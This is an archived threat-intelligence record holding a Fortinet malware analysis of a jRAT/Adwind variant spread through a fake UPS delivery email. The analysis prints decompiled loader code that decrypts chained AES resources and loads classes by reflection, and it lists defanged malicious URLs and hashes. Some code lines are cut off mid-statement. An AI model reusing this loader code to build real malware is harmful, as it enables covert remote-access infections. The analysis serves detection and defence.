{
	"id": "262b3acd-daa9-46f8-b3b5-9177c577b88d",
	"created_at": "2026-04-06T00:13:11.204553Z",
	"updated_at": "2026-04-10T13:12:13.720652Z",
	"deleted_at": null,
	"sha1_hash": "8b30187ae1260b20c2e0a899f65d20dbbc0bc86a",
	"title": "New jRAT/Adwind Variant Being Spread With Package Delivery Scam",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1125020,
	"plain_text": "New jRAT/Adwind Variant Being Spread With Package Delivery Scam\r\nBy Xiaopeng Zhang\r\nPublished: 2018-02-16 · Archived: 2026-04-05 12:51:48 UTC\r\nAt the beginning of February 2018, FortiGuard Labs collected a malicious email with the subject “UPS DELIVERY UPDATE”, as shown in Figure 1. Phishers and scammers traditionally misuse the names of well-known organizations and individuals to make their malicious messages seem legitimate, allowing them to trick unsuspecting victims more easily. This email message contains a fake order tracking number with a bogus hyperlink that, rather than connecting the user to a legitimate website, downloads a malicious jar file. After a quick analysis, I was able to determine that this malware is jRAT/Adwind.\r\njRAT (also called Adwind) is a commercial cross-platform remote access Trojan written in Java. It is designed to control and collect data from a victim’s machine regardless of whether it is running Windows, Linux, Mac OS X, or BSD. While jRAT is not new, it keeps upgrading its techniques. In this blog, I will show how the variant we collected works on a Windows system.\r\nDownloading the jRAT malware from the hyperlink\r\nFigure 1 shows the content of the fake UPS email. The hyperlink on the order tracking number points to the malware download page “hxxp://upsshippingilabel.4pu.com/”. Note that a real UPS tracking link has this format: “hxxp://www.ups.com/WebTracking/processInputRequest?loc=en_US\u0026Requester=NES\u0026tracknum=1Z5F606X123456789”.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 1 of 15\n\nFigure 1. Fake UPS shipment notice\r\nFigure 2. 
Downloading the jRAT malware in IE\r\nAs you can see from Figure 2, the downloaded file is named “upslabels.jar”.\r\nA jar file is a Java package that is executed by java.exe. This means that for the malware to run, the victim must have a Java Runtime Environment installed on the system.\r\nStatic analysis of the upslabels.jar file (the parent-jar)\r\nWhen the jar file is opened in a Java static analysis tool, it is obvious that it is obfuscated to resist analysis. The package names, class names, function names, field names, and resource names are all random strings. It even defeats the JD-GUI tool, because the jar’s entry point, the main function, is decompiled as empty. Figure 3 shows the view of “upslabels.jar” in an analysis tool.\r\nFigure 3. Random names and empty main function in JD-GUI\r\nI was able to decompile the jar file into Java source code so I could debug it in Eclipse. Note that when upslabels.jar starts, it drops another jar file, so I call upslabels.jar the parent-jar; it acts much like a packer does for PE files. I call the dropped jar file the main-jar.\r\nTo make analysis harder, all the constant strings are split up and defined across many different classes, and the pieces are concatenated at runtime. 
Below are two code snippets showing how the split strings are defined, and how one split string is concatenated.\r\npublic class Unmedaled\r\n{\r\n[…]\r\n public static void hayneTech()\r\n {\r\n Unpeg.difdaBruzz = \"com.oofiest.flatterer.Shreds.get\";\r\n Unpeg.noxChoop = \"BuggyAlogy(), com.\";\r\n Unpeg.corrBlimy = \"miesFubs(), com.ch\";\r\n Unpeg.jismDupe = \"stils.Un\";\r\n Unpeg.mhoAevum = \"m.cholle\";\r\n Unpeg.thyselBazar = \"AES\";\r\n Unpeg.mendeeHunh = \"AES\";\r\n Unpeg.boohooTalked = \"\\0002216ca4\";\r\n Unpeg.rebelWasir = \"st/oe\";\r\n Unpeg.pnyxLwo = \"l.Jrat\";\r\n}\r\n}\r\npublic class NeukBons\r\n{\r\n[…]\r\n public static void huminEntr()\r\n {\r\n Unpeg.dartreJazy = (new StringBuilder()).append(Unpeg.difdaBruzz).append(Unpeg.simasHaul).append(Unpeg.pinda\r\n }\r\n}\r\nSome of the split strings are combined into Java code that is executed later by a ScriptEngine object through its eval function. This also hides the key-derivation code from static analysis. Below is an example of a call to eval:\r\npublic static void unrowWote() throws ScriptException\r\n{\r\n AeacusAdm.abyChm.eval(Unpeg.keltsKru);\r\n}\r\n \r\n“AeacusAdm.abyChm” is a ScriptEngine object. “Unpeg.keltsKru” is a String variable that holds the concatenated string “com.oofiest.RectaSeers.pedeeGunsel=com.choller.pastils.Unpeg.getAtaPawls().getBytes();”, which is then executed by the AeacusAdm.abyChm.eval function. The result is an AES key used to decrypt other classes, so the key is saved in the variable com.oofiest.RectaSeers.pedeeGunsel with the value [0, 50, 50, 49, 54, 99, 97, 52, 51, 55, 98, 52, 52, 52, 53, 0].\r\nThis variant also contains many resource files (see the file list in Figure 3), all of which are encrypted. 
The parent-jar reads and decrypts them, and some of the decrypted data is then assembled into Java class files, constant strings, or URL strings.\r\nDynamic analysis of the upslabels.jar file\r\nNext, I will provide more details about how this variant works, in chronological order.\r\nWhen started with java.exe, this variant sets two JVM global properties, \"q.main-class\"-\u003e\"operational.Jrat\" and \"q.encryptedPathsPath\"-\u003e\"/com/choller/LidoMath\", by calling the System.setProperty function. The value of the property “q.main-class” is retrieved later by a dynamically generated class to load the main class. The value of the property “q.encryptedPathsPath” is \"/com/choller/LidoMath\", which is the first element of an encrypted resource chain.\r\nFigure 4. Calling System.setProperty\r\nIt then loads data from a resource file and decrypts it with AES to obtain a class file. This becomes a dynamic class, loaded as “qeaqtor.Loader” by calling the ClassLoader.defineClass method. Figure 5 shows the main steps of loading the dynamic class “qeaqtor.Loader”. I added comments to the code for better understanding.\r\nFigure 5. Load dynamic class qeaqtor.Loader\r\nAfter that, the “Loader” class in package “qeaqtor” is ready to be used. It contains four methods: bytes, criminal, go and resource. Only go is declared as “public static”. The go method is the entry method of this class. It is obtained from the result of calling qeaqtor.Loader.class.getMethods(), which returns a method array whose first element is the method go. 
I dumped the class to a local file and then decompiled it, so in the snippet below you can see how the class qeaqtor.Loader and its member variables are declared, as well as the code of the method go.\r\npackage qeaqtor;\r\nimport java.io.ByteArrayInputStream;\r\nimport java.io.ByteArrayOutputStream;\r\nimport java.io.DataInputStream;\r\nimport java.io.InputStream;\r\nimport java.io.ObjectInputStream;\r\nimport java.lang.reflect.Method;\r\nimport java.util.LinkedHashMap;\r\nimport java.util.zip.GZIPInputStream;\r\nimport javax.crypto.Cipher;\r\nimport javax.crypto.spec.SecretKeySpec;\r\n \r\npublic class Loader\r\n{\r\n public static final String[] qeaqtor_resources = { \"/qeaqtor/Loader.class\", \"/qeaqtor/URLStreamHandler.class\",\r\n static String _main_class;\r\n static String _encryptedPathsPath;\r\n public static String entryKey = \"0123456789012345\";//AES key\r\n static Class bootsrapClass;\r\n static LinkedHashMap\u003cString, byte[]\u003e criminals;\r\n static LinkedHashMap\u003cString, String[]\u003e paths;\r\n \r\n public static void go(Class bootsrapClass, String[] args) throws Throwable\r\n {\r\n if (args == null) {args = new String[0];}\r\n \r\n _main_class = System.getProperty(\"q.main-class\");\r\n _encryptedPathsPath = System.getProperty(\"q.encryptedPathsPath\");\r\n \r\n if (_main_class == null)\r\n return;\r\n ByteArrayOutputStream mainBaos = new ByteArrayOutputStream();\r\n \r\n DataInputStream dis; InputStream is;\r\n String nextPath = _encryptedPathsPath;\r\n // walk the encrypted resource chain; each decrypted blob starts with the path of the next resource\r\n for (;;){\r\n is = bootsrapClass.getResourceAsStream(nextPath);\r\n if (is == null) break;\r\n ByteArrayOutputStream baos = new ByteArrayOutputStream();\r\n int readed;\r\n byte[] buffer = new byte[1024];\r\n while ((readed = is.read(buffer)) \u003e -1)\r\n baos.write(buffer, 0, readed);\r\n byte[] encbytes = baos.toByteArray();\r\n Cipher cipher = 
Cipher.getInstance(\"AES\");\r\n cipher.init(2, new SecretKeySpec(entryKey.getBytes(\"UTF-8\"), \"AES\")); // 2 == Cipher.DECRYPT_MODE\r\n encbytes = cipher.doFinal(encbytes);\r\n is = new ByteArrayInputStream(encbytes);\r\n dis = new DataInputStream(is);\r\n nextPath = dis.readUTF();\r\n while ((readed = dis.read(buffer)) \u003e -1)\r\n mainBaos.write(buffer, 0, readed);\r\n }\r\n ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(mainBaos.toByteArray()));\r\n paths = (LinkedHashMap)ois.readObject();\r\n criminals = (LinkedHashMap)ois.readObject();\r\n ois.close();\r\n \r\n ClassLoader cl = bootsrapClass.getClassLoader();\r\n // reflectively reach the protected ClassLoader.defineClass to load classes from decrypted bytes\r\n Method defineClass = ClassLoader.class.getDeclaredMethod(\"defineClass\",\r\n new Class[] {\r\n String.class,\r\n byte[].class,\r\n Integer.TYPE,\r\n Integer.TYPE }\r\n );\r\n \r\n defineClass.setAccessible(true);\r\n String res[] = qeaqtor_resources;\r\n Class last = null;\r\n int i = 0; i = res.length;\r\n for (int j = 0; j \u003c i;) {\r\n String qc = res[j];\r\n if ((i++ == 0) || !qc.endsWith(\".class\"))\r\n continue;\r\n \r\n is = null;\r\n try {\r\n String canname = qc.replace('/', '.');\r\n canname = canname.substring(1, canname.length() - 6);\r\n byte[] bytes = resource(qc);\r\n if ((last = (Class)defineClass.invoke(cl, new Object[] { canname, bytes, Integer.valueOf(0), Integer\r\n return;\r\n \r\n try {is.close();} catch (Throwable localThrowable2) {}\r\n j++;\r\n }\r\n catch (Throwable t) { return; }\r\n finally{\r\n try {is.close();}\r\n catch (Throwable localThrowable4) {}\r\n }\r\n }\r\n if (last == null) {return;}\r\n // hand control to the last loaded class (Header) through its static go method\r\n last.getMethod(\"go\", new Class[] { String[].class })\r\n .invoke(null, new Object[] { args });\r\n}\r\n[…]\r\nHere it reads out \"/com/choller/LidoMath\" by 
calling System.getProperty() on the JVM global property \"q.encryptedPathsPath\". As I said above, this is the first element in a resource chain. It is the path to an AES-encrypted resource file. After decrypting its content and calling nextPath = dis.readUTF();, it gets the next resource’s path from the decrypted data. It also reads another global property value into the Loader class variable _main_class, which is used by the dynamically loaded class that follows.\r\nFigure 6 is a screenshot of the partially decrypted data. You can see that \"/com/choler/BayaFinn\" will be the next one in the resource chain.\r\nFigure 6. Decrypted resource \"/com/choller/LidoMath\"\r\nIn this way, it loads all resources in the resource chain and then concatenates the decrypted data into the mainBaos object.\r\nThe concatenated data is a serialized LinkedHashMap: the code deserializes it into the Loader.paths object. As documented in the Java API, the class is declared as “Class LinkedHashMap\u003cK,V\u003e”: it maps a Key to a Value, which you retrieve by calling get() with the Key. In this case, the Value consists of a resource path and an AES decryption key. In the following steps, using this LinkedHashMap object, the malware can read and decrypt a number of resource files, including a URL, more dynamic class files, and the dropped working jar file.\r\nFigure 7 shows one pair of K and V from the paths object. It contains 122 pairs of K and V.\r\nFigure 7. 
View of LinkedHashMap object paths\r\nThe Loader class has a class member qeaqtor_resources declared as follows:\r\npublic static final String[] qeaqtor_resources\r\n= {\"/qeaqtor/Loader.class\", \"/qeaqtor/URLStreamHandler.class\", \"/qeaqtor/URLStreamHandlerFactory.class\", \"/qeaqt\r\nIt is a string array containing five strings, all of which are Keys in the paths object. The next step in the go method is to load all of these classes except for the first one (it has already been loaded). Through paths.get() we obtain the corresponding resource path and AES decryption key, decrypt the resource, and load it into the JVM as a class, just as the Loader class was loaded. At the bottom of this function, it calls the last loaded class’s go() method via getMethod(“go”…) and invoke(). The last loaded class is “/qeaqtor/Header.class”, which I also dumped to a local file for further analysis.\r\nLet’s move forward to see what the Header.go method does. It calls the Loader.criminal(\"smart-qrypt-address\"); method to get a URL. Here “smart-qrypt-address” is a Key in Loader.paths. It ends up with the URL string \"hxxps://vvrhhhnaijyj6s2m.onion.top/storage/cryptOutput/0.81189400 1517566981.jar\". It then accesses this URL, downloads a new file to replace the current parent-jar, and runs it. In short, it upgrades itself every time it starts. Figure 8, below, contains the code snippet.\r\nFigure 8. Upgrades itself every time it starts up\r\nThe Header.go method continues by loading the dynamic class whose name is in Loader._main_class, i.e. “operational.Jrat”. It is formatted as “criminal/0/operational/Jrat.class”. No doubt, this is a Key in Loader.paths as well. The resource file for this Key is “/com/choller/britchka/HiantPfc”. 
Decrypting it yields a class file, and then the “operational.Jrat” class is loaded dynamically into this JVM. Below is the related code snippet.\r\n \r\nObject brother = new URLClassLoader(urls);\r\n \r\nClass sister = ((ClassLoader)brother).loadClass(Loader._main_class);\r\n \r\nsister.getMethod(\"main\", new Class[] { String[].class }).invoke(null, new Object[] { args });\r\nFinally, the function operational.Jrat.main is called through invoke.\r\nThe purpose of the Jrat.main function is to drop another jar file into the system temp folder, which then takes control and performs the actual malicious actions on the victim’s system. This is the main-jar file. Similarly, the main-jar file is encrypted and split across different resource files, and it can be restored through Loader.paths. Figure 9, below, is the code snippet of operational.Jrat.main that shows how the main-jar is restored and run.\r\nFigure 9. Run main-jar up\r\nHere is a view of the overall flow chart of what upslabels.jar does.\r\nFigure 10. The overall flow chart of upslabels.jar execution\r\nWhen the main-jar runs, it adds itself to the startup group in the system registry so that it runs whenever the system starts. It also covertly runs two VBS scripts from the system temp folder to enumerate the AntiVirus and Firewall products installed on the system. Figure 11 shows the process tree in Process Monitor when upslabels.jar runs.\r\nFigure 11. Process tree when running upslabels.jar\r\nSo far, I’m still working on analyzing the dropped main-jar.\r\nDuring my analysis, we also observed that there were many different jRAT variants captured in our malware collection system. 
The list below is a partial listing of them.\r\nSolution\r\nThe FortiGuard Antivirus service has detected the file \"upslabels.jar\" as Java/Adwind.AAV!tr. The jar download URL has been rated as Malicious Websites by the FortiGuard Webfilter service.\r\nIOC\r\nURL list:\r\nhxxp://upsshippingilabel.4pu.com/\r\nhxxps://vvrhhhnaijyj6s2m.onion.top/storage/cryptOutput/0.81189400 1517566981.jar\r\nSample SHA-256 hashes:\r\nupslabels.jar\r\n02A47E7FDFF641C9DE851D8434E4627E3E2BFB20FD0D776E8528DC719039AC36\r\nSource: https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
	],
	"report_names": [
		"new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434391,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.pdf",
		"text": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.txt",
		"img": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.jpg"
	}
}